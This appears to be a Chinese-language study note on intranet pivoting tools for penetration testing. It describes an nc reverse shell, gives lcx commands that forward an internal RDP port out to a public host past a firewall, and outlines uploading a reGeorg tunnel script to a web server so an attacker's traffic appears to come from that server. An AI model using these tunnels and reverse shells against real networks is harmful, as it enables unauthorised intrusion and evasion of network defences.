内网代理——常用工具

端口转发工具lcx
Web代理脚本regeorg
Shell反弹脚本nc 、VPN

  1. nc:nc首先对公网主机端口进行监听,再到内网输入公网IP,端口号,以及执行文件,比如cmd.exe,就可以成功反弹内网主机的shell

  2. 第一个是 LCX 对 windows 3389 的转发;
    第二个是 reGeorg 通过上传对应脚本(PHP/ASPX/JSP),然后全局代理进一步内网渗透;
    第三个是 EarthWorm

  3. LCX:

    1)端口转发(listen和slave成对使用 2)端口映射(tran)

    Windows版是lcx.exe,Linux版为portmap,

    lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

    (1)首先内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

    lcx.exe –listen 4444 5555

    (2)其次是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。

    此时已经把内网的3389端口转发到了公网的5555端口。可以通过127.0.0.1:5555连接到内网的远程桌面。

    还有一种情况就是3389出不了防火墙,他还有一项功能就是端口映射,你吧3389映射到一个不被限制的端口就可以直接远程桌面链接了。

  4. reGeorg+proxifier内网代理+端口转发:

    目的:攻击者A 通过web应用B 看内网主机C, 在C上查看流量发现是B访问的而非攻击者。
    步骤如下:
    第一步: 上传tunnel 文件 到 Web应用B
    第二步: 在A 上,使用reGeorgSocksProxy.py 并指定端口
    第三步: 设置自己的代理Proxifier 或者SocksCap64(本次使用的是proxifier)
    第四步: 在C上使用wireshark 查看流量信息。(当然也可以查看日志)内网端口通过http/https转发到本地,然后本地使用socks5正向代理穿透防火墙到达服务器,即是一个环路。

你可能感兴趣的:(渗透测试面试,服务器,linux,安全)